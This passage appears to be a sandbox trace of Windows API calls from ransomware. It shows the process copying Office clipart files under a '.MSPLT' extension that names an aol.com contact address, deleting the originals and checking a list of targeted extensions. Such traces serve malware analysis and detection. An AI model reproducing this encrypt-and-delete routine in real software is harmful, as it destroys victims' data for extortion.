office\\root\\clipart\\pub60cor\\an01218_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x468 [0292.822] GetLastError () returned 0x0 [0292.822] ReadFile (in: hFile=0x46c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0xbc4, lpOverlapped=0x0) returned 1 [0292.825] WriteFile (in: hFile=0x468, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xbd0, lpOverlapped=0x0) returned 1 [0292.826] ReadFile (in: hFile=0x46c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0292.827] WriteFile (in: hFile=0x468, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0292.827] SetEndOfFile (hFile=0x468) returned 1 [0292.827] CloseHandle (hObject=0x468) returned 1 [0292.832] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.832] SetEndOfFile (hFile=0x46c) returned 1 [0292.836] CloseHandle (hObject=0x46c) returned 1 [0292.836] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0292.837] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01218_.wmf")) returned 1 [0292.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0292.837] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0292.837] lstrlenW (lpString=".doc") returned 4 [0292.837] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0292.837] lstrlenW (lpString=".docx") returned 5 [0292.838] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0292.838] lstrlenW (lpString=".pdf") returned 4 [0292.838] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0292.838] lstrlenW (lpString=".xls") returned 4 [0292.838] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0292.838] lstrlenW (lpString=".xlsx") returned 5 [0292.838] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0292.838] lstrlenW (lpString=".ppt") returned 4 [0292.838] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0292.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0292.838] lstrlenW (lpString=".zip") returned 4 [0292.838] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0292.838] lstrlenW (lpString=".rar") returned 4 [0292.838] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0292.838] lstrlenW (lpString=".bz2") returned 4 [0292.838] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0292.838] lstrlenW (lpString=".7z") returned 3 [0292.838] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0292.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0292.838] lstrlenW (lpString=".dbf") returned 4 [0292.838] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0292.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0292.838] lstrlenW (lpString=".1cd") returned 4 [0292.838] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0292.838] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0292.838] lstrlenW (lpString=".jpg") returned 4 [0292.838] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0292.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0292.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0292.839] lstrlenW (lpString=".doc") returned 4 [0292.839] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0292.839] lstrlenW (lpString=".docx") returned 5 [0292.839] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0292.839] lstrlenW (lpString=".pdf") returned 4 [0292.839] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0292.839] lstrlenW (lpString=".xls") returned 4 [0292.839] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0292.839] lstrlenW (lpString=".xlsx") returned 5 [0292.839] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0292.839] lstrlenW (lpString=".ppt") returned 4 [0292.839] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0292.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0292.839] lstrlenW (lpString=".zip") returned 4 [0292.839] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0292.839] lstrlenW (lpString=".rar") returned 4 [0292.839] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0292.839] lstrlenW (lpString=".bz2") returned 4 [0292.839] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0292.839] lstrlenW (lpString=".7z") returned 3 [0292.839] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0292.839] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0292.839] lstrlenW (lpString=".dbf") returned 4 [0292.839] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0292.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0292.840] lstrlenW (lpString=".1cd") returned 4 [0292.840] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0292.840] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 68 [0292.840] lstrlenW (lpString=".jpg") returned 4 [0292.840] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0292.840] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0292.840] lstrlenW (lpString="AN01251_.WMF") returned 12 [0292.840] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0292.841] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=2756) returned 1 [0292.841] CloseHandle (hObject=0x46c) returned 1 [0292.841] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf")) returned 0x220 [0292.841] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.842] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0292.842] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.842] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.842] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0293.275] GetLastError () returned 0x0 [0293.276] ReadFile (in: hFile=0x46c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0xac4, lpOverlapped=0x0) returned 1 [0293.615] WriteFile (in: hFile=0x43c, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xad0, lpOverlapped=0x0) returned 1 [0293.617] ReadFile (in: hFile=0x46c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0293.617] WriteFile (in: hFile=0x43c, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0293.617] SetEndOfFile (hFile=0x43c) returned 1 [0293.692] CloseHandle (hObject=0x43c) returned 1 [0293.696] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.697] SetEndOfFile (hFile=0x46c) returned 1 [0293.736] CloseHandle (hObject=0x46c) returned 1 [0293.736] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0293.737] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf")) returned 1 [0293.737] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0293.737] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0293.738] lstrlenW (lpString=".doc") returned 4 [0293.738] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0293.738] lstrlenW (lpString=".docx") returned 5 [0293.738] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0293.738] lstrlenW (lpString=".pdf") returned 4 [0293.738] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0293.738] lstrlenW (lpString=".xls") returned 4 [0293.738] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0293.738] lstrlenW (lpString=".xlsx") returned 5 [0293.738] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0293.738] lstrlenW (lpString=".ppt") returned 4 [0293.738] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0293.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0293.738] lstrlenW (lpString=".zip") returned 4 [0293.738] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0293.738] lstrlenW (lpString=".rar") returned 4 [0293.738] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0293.738] lstrlenW (lpString=".bz2") returned 4 [0293.738] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0293.738] lstrlenW (lpString=".7z") returned 3 [0293.738] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0293.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0293.738] lstrlenW (lpString=".dbf") returned 4 [0293.738] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0293.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0293.738] lstrlenW (lpString=".1cd") returned 4 [0293.738] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0293.738] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0293.738] lstrlenW (lpString=".jpg") returned 4 [0293.738] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0293.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0293.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0293.739] lstrlenW (lpString=".doc") returned 4 [0293.739] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0293.739] lstrlenW (lpString=".docx") returned 5 [0293.739] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0293.739] lstrlenW (lpString=".pdf") returned 4 [0293.739] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0293.739] lstrlenW (lpString=".xls") returned 4 [0293.739] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0293.739] lstrlenW (lpString=".xlsx") returned 5 [0293.739] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0293.739] lstrlenW (lpString=".ppt") returned 4 [0293.739] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0293.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0293.739] lstrlenW (lpString=".zip") returned 4 [0293.739] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0293.739] lstrlenW (lpString=".rar") returned 4 [0293.739] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0293.739] lstrlenW (lpString=".bz2") returned 4 [0293.739] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0293.739] lstrlenW (lpString=".7z") returned 3 [0293.739] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0293.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0293.739] lstrlenW (lpString=".dbf") returned 4 [0293.739] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0293.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0293.739] lstrlenW (lpString=".1cd") returned 4 [0293.739] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0293.739] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0293.739] lstrlenW (lpString=".jpg") returned 4 [0293.740] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0293.740] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0293.740] lstrlenW (lpString="AN04108_.WMF") returned 12 [0293.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0293.744] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=2344) returned 1 [0293.744] CloseHandle (hObject=0x46c) returned 1 [0293.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf")) returned 0x220 [0293.745] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0293.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0293.745] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.745] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0293.746] GetLastError () returned 0x0 [0293.747] ReadFile (in: hFile=0x46c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x928, lpOverlapped=0x0) returned 1 [0293.751] WriteFile (in: hFile=0x43c, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0x930, lpOverlapped=0x0) returned 1 [0293.753] ReadFile (in: hFile=0x46c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesRead=0x298fecc*=0x0, lpOverlapped=0x0) returned 1 [0293.753] WriteFile (in: hFile=0x43c, lpBuffer=0x396f020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x298fc94, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, lpNumberOfBytesWritten=0x298fc94*=0xec, lpOverlapped=0x0) returned 1 [0293.753] SetEndOfFile (hFile=0x43c) returned 1 [0293.753] CloseHandle (hObject=0x43c) returned 1 [0293.756] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.756] SetEndOfFile (hFile=0x46c) returned 1 [0293.759] CloseHandle (hObject=0x46c) returned 1 [0293.760] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0293.760] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf")) returned 1 [0293.763] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0293.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0293.764] lstrlenW (lpString=".doc") returned 4 [0293.764] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0293.764] lstrlenW (lpString=".docx") returned 5 [0293.764] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0293.764] lstrlenW (lpString=".pdf") returned 4 [0293.764] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0293.764] lstrlenW (lpString=".xls") returned 4 [0293.764] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0293.764] lstrlenW (lpString=".xlsx") returned 5 [0293.764] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0293.764] lstrlenW (lpString=".ppt") returned 4 [0293.764] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0293.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0293.764] lstrlenW (lpString=".zip") returned 4 [0293.764] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0293.764] lstrlenW (lpString=".rar") returned 4 [0293.764] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0293.764] lstrlenW (lpString=".bz2") returned 4 [0293.764] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0293.764] lstrlenW (lpString=".7z") returned 3 [0293.764] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0293.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0293.764] lstrlenW (lpString=".dbf") returned 4 [0293.764] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0293.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0293.764] lstrlenW (lpString=".1cd") returned 4 [0293.764] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0293.764] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0293.764] lstrlenW (lpString=".jpg") returned 4 [0293.764] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0293.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0293.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0293.765] lstrlenW (lpString=".doc") returned 4 [0293.765] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0293.765] lstrlenW (lpString=".docx") returned 5 [0293.765] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0293.765] lstrlenW (lpString=".pdf") returned 4 [0293.765] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0293.765] lstrlenW (lpString=".xls") returned 4 [0293.765] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0293.765] lstrlenW (lpString=".xlsx") returned 5 [0293.765] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0293.765] lstrlenW (lpString=".ppt") returned 4 [0293.765] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0293.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0293.765] lstrlenW (lpString=".zip") returned 4 [0293.765] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0293.765] lstrlenW (lpString=".rar") returned 4 [0293.765] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0293.765] lstrlenW (lpString=".bz2") returned 4 [0293.765] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0293.765] lstrlenW (lpString=".7z") returned 3 [0293.765] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0293.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0293.765] lstrlenW (lpString=".dbf") returned 4 [0293.765] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0293.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0293.765] lstrlenW (lpString=".1cd") returned 4 [0293.765] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0293.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0293.766] lstrlenW (lpString=".jpg") returned 4 [0293.766] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0293.766] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0293.766] lstrlenW (lpString="AN04117_.WMF") returned 12 [0293.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04117_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0293.766] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x298ff14 | out: lpFileSize=0x298ff14*=6060) returned 1 [0293.767] CloseHandle (hObject=0x46c) returned 1 [0293.767] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04117_.wmf")) returned 0x220 [0293.767] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04117_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0293.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04117_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0293.767] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.768] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x298fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04117_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04117_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0294.044] GetLastError () returned 0x0 [0294.044] ReadFile (in: hFile=0x46c, lpBuffer=0x396f020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x298fecc, lpOverlapped=0x0 | out: lpBuffer=0x396f020*, 